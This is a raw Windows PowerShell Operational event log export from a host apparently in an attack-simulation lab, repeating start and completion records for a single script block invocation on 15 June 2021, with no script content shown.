EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475770
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475769
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475768
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475767
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475766
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475765
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475764
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475763
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475762
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475761
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475760
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475759
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475758
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475757
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475756
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475755
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475754
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475753
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475752
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475751
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475750
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475749
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475748
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475747
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475746
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475745
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475744
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475743
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475742
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475741
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475740
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475739
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475738
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475737
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475736
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475735
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475734
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475733
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475732
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475731
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475730
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475729
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475728
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475727
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475726
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475725
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475724
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475723
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475722
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475721
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475720
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475719
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475718
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475717
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475716
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
